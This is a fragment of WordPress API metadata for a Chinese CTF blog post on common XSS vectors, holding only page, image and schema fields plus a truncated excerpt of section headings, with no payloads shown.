0x01. &lt;a&gt; \u6807\u7b7e 0x02. &lt;img&gt;\u6807\u7b7e 0x03. &lt; [&hellip;]","og_url":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/\u5e38\u7528xss\/","og_site_name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","article_published_time":"2025-06-27T14:36:17+00:00","article_modified_time":"2025-07-02T12:49:49+00:00","og_image":[{"width":1024,"height":576,"url":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a-1024x576.jpg","type":"image\/jpeg"}],"author":"Speeder","twitter_card":"summary_large_image","twitter_image":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg","twitter_misc":{"\u4f5c\u8005":"Speeder","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"12 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#article","isPartOf":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/"},"author":{"name":"Speeder","@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"headline":"\u5e38\u7528XSS","datePublished":"2025-06-27T14:36:17+00:00","dateModified":"2025-07-02T12:49:49+00:00","mainEntityOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/"},"wordCount":739,"commentCount":0,"publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg","articleSection":["CTF"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/","url":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/","name":"\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","isPartOf":{"@id":"https:\/\/koishi.team\/#website"},"primaryImageOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#primaryimage"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg","datePublished":"2025-06-27T14:36:17+00:00","dateModified":"2025-07-02T12:49:49+00:00","breadcrumb":{"@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#primaryimage","url":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg","width":2560,"height":1440},{"@type":"BreadcrumbList","@id":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/koishi.team\/"},{"@type":"ListItem","position":2,"name":"\u5e38\u7528XSS"}]},{"@type":"WebSite","@id":"https:\/\/koishi.team\/#website","url":"https:\/\/koishi.team\/","name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","description":"\u300cSubterranean Rose\u300d","publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/koishi.team\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3","name":"Speeder","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","url":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","caption":"Speeder"},"logo":{"@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg"},"sameAs":["https:\/\/koishi.team"],"url":"https:\/\/koishi.team\/index.php\/author\/speeder\/"}]}},"_links":{"self":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/comments?post=605"}],"version-history":[{"count":4,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/605\/revisions"}],"predecessor-version":[{"id":705,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/605\/revisions\/705"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media\/644"}],"wp:attachment":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media?parent=605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/categories?post=605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/tags?post=605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}